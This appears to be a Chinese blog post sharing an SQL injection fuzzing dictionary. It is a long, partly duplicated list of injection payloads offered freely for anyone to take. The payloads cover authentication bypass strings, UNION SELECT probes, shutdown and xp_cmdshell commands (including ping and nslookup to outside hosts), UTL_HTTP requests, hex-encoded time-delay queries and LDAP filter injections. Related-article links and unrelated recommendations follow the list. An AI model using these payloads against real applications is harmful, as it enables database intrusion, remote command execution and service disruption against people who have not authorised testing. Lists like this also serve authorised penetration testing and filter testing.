需要的自取

'

"

#

-

--

' --

--';

' ;

= '

= ;

= --

\x23

\x27

\x3D \x3B'

\x3D \x27

\x27\x4F\x52 SELECT *

\x27\x6F\x72 SELECT *

'or select *

admin'--

';shutdown--

<>"'%;)(&+

' or ''='

' or 'x'='x

" or "x"="x

') or ('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

"' or 1 --'"

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

" or 1=1 or ""="

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

&lt;&gt;&quot;'%;)(&amp;+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

'

' and '' like '

' AnD '' like '

' or '' like '

' and '' like '%

' aND '' like '%

' and '' like ''--

' and 2>1--

' and 2>3--

') and ('x'='x

) and (1=1

'or''='

'or'='or'

a' or 1=1--

"a"" or 1=1--"

 or a = a

a' or 'a' = 'a

1 or 1=1

a' waitfor delay '0:0:10'--

1 waitfor delay '0:0:10'--

declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)

declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)

declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)

declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)

a'

?

' or 1=1

‘ or 1=1 --

x' AND userid IS NULL; --

x' AND email IS NULL; --

anything' OR 'x'='x

x' AND 1=(SELECT COUNT(*) FROM tabname); --

x' AND members.email IS NULL; --

x' OR full_name LIKE '%Bob%

23 OR 1=1

'; exec master..xp_cmdshell 'ping 172.10.1.255'--

'

'%20or%20''='

'%20or%20'x'='x

%20or%20x=x

')%20or%20('x'='x

0 or 1=1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

 or 0=0 #"

or 0=0 #

' or 1=1--

" or 1=1--

' or '1'='1'--

' or 1 --'

or 1=1--

or%201=1

or%201=1 --

' or 1=1 or ''='

 or 1=1 or ""=

' or a=a--

 or a=a

') or ('a'='a

) or (a=a

hi or a=a

hi or 1=1 --"

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

"hi"") or (""a""=""a"

'hi' or 'x'='x';

@variable

,@variable

PRINT

PRINT @@variable

select

insert

as

or

procedure

limit

order by

asc

desc

delete

update

distinct

having

truncate

replace

like

handler

bfilename

' or username like '%

' or uname like '%

' or userid like '%

' or uid like '%

' or user like '%

exec xp

exec sp

'; exec master..xp_cmdshell

'; exec xp_regread

t'exec master..xp_cmdshell 'nslookup www.google.com'--

--sp_password

\x27UNION SELECT

' UNION SELECT

' UNION ALL SELECT

' or (EXISTS)

' (select top 1

'||UTL_HTTP.REQUEST

1;SELECT%20*

to_timestamp_tz

tz_offset

<>"'%;)(&+

'%20or%201=1

%27%20or%201=1

%20$(sleep%2050)

%20'sleep%2050'

char%4039%41%2b%40SELECT

&apos;%20OR

'sqlattempt1

(sqlattempt2)

|

%7C

*|

%2A%7C

*(|(mail=*))

%2A%28%7C%28mail%3D%2A%29%29

*(|(objectclass=*))

%2A%28%7C%28objectclass%3D%2A%29%29

(

%28

)

%29

&

%26

!

%21

' or 1=1 or ''='

' or ''='

x' or 1=1 or 'x'='y

/

//

//*

*/*

a' or 3=3--

"a"" or 3=3--"

' or 3=3

‘ or 3=3 --

SQL注入Fuzzing字典的更多相关文章

  1. SQL注入fuzz字典

    length Length + handler likeLiKe selectSeleCT sleepSLEEp databaseDATABASe delete having oroR asAs -~ ...

  2. 深入理解SQL注入绕过WAF和过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  3. DAY5 DVWA之SQL注入演练(low)

    1.设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸. 2.测试和分析页面的功能       这里有一个输入框 根据上面的提示,输入用户的id.然后我们输入之后,发现它返回了关于这个 ...

  4. 深入了解SQL注入绕过waf和过滤机制

    知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 ...

  5. 见招拆招:绕过WAF继续SQL注入常用方法

    Web Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断绕过.WAF bypass是一个永恒的话题,不少基友也总结了很多奇技怪招.那今天我在这里做个小小的扫盲吧.先来说说 ...

  6. 仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell

    最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是 5173平台交易的网站,叫我直接把号的信息填上去然后填 ...

  7. 深入理解SQL注入绕过WAF与过滤机制

    知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 ...

  8. 『SQL注入』 User-Agent 手工注入的探测与利用分析

    原理很简单:后台在接收UA时没有对UA做过滤,也没有PDO进行数据交互(实际PDO是非常有必要的),导致UA中有恶意代码,最终在数据库中执行. Bug 代码: 本地顺手打了一个环境,Bug 代码部分: ...

  9. 实验吧_简单的sql注入_1、2、3

    简单的sql注入1 看着这个简单的界面,一时间没有特别好的思路,先输入一个1',发生了报错 初步猜测这是一个字符型的注入,他将我们输入的语句直接当成sql语句执行了,按题目的意思后面肯定过滤了很多注入 ...

  10. DVWA 黑客攻防演练(八)SQL 注入 SQL Injection

    web 程序中离不开数据库,但到今天 SQL注入是一种常见的攻击手段.如今现在一些 orm 框架(Hibernate)或者一些 mapper 框架( iBatis)会对 SQL 有一个更友好的封装,使 ...

随机推荐

  1. HarmonyOS 4.0 实况窗上线!支付宝实现医疗场景智能提醒

    本文转载自支付宝体验科技,作者是蚂蚁集团客户端工程师博欢,介绍了支付宝如何基于 HarmonyOS 4.0 实况窗实现医疗场景履约智能提醒. 1.话题背景 8 月 4 日,华为在 HDC(华为 202 ...

  2. AT 下分记录

    7.30 AGC063 \(+30=1620\) B 做法假 WA 了三次,为啥总是吃了罚时才能发现问题啊 心态还是需要解决的问题.过完 B 啥都想不出来又自闭了

  3. GO语言基础之基本运算符

    GO语言基础之基本运算符 目录 GO语言基础之基本运算符 一.运算符 内置运算符: 二.算术运算符 三.关系运算符 四.逻辑运算符 五.位运算符 六.赋值运算符 一.运算符 作用:运算符用于在程序运行 ...

  4. 深挖 Python 元组 pt.1

    哈喽大家好,我是咸鱼 好久不见甚是想念,2023 年最后一次法定节假日已经结束了,不知道各位小伙伴是不是跟咸鱼一样今天就开始"搬砖"了呢? 我们知道元组(tuple)是 Pytho ...

  5. 校招零Offer要不要先找实习?

    国庆前后被问到最多的问题是:"磊哥,我现在还是 0 Offer,要不要先去找个实习?",给大家看看部分截图. 同学 A: 同学 B: 同学 C: 其他还有一些截图,我这里就不一一贴 ...

  6. ELK+ filebeat

    ELK 企业级日志分析系统 ELK 概述 1.ELK 简介 ELK平台是一套完整的日志集中处理解决方案,将 ElasticSearch.Logstash 和 Kiabana 三个开源工具配合使用, 完 ...

  7. 【v2v迁移】Xen2kvm 迁移-Windows篇

    迁移环境: 源平台:华为FusionComputeV100R006C10SPC101 目标平台:基于KVM虚拟化的云平台,本文以原生的libvirt为例 虚拟机:Windows server 2012 ...

  8. DFS(深度优先搜索)洛谷P1162

    看大佬们dfs一遍就出结果,蒟蒻的我dfs了三遍,当然这题也可以用bfs做,但是dfs不用队列代码短一些. #include <iostream> #include <vector& ...

  9. 微信小程序:音乐播放器

    音乐资源使用的是QQ音乐资源.图片资源使用的网易云音乐的专辑图片. HTML: <view class="container"> <div wx:for=&quo ...

  10. go 中如何实现定时任务

    定时任务简介 定时任务是指按照预定的时间间隔或特定时间点自动执行的计划任务或操作.这些任务通常用于自动化重复性的工作,以减轻人工操作的负担,提高效率.在计算机编程和应用程序开发中,定时任务是一种常见的 ...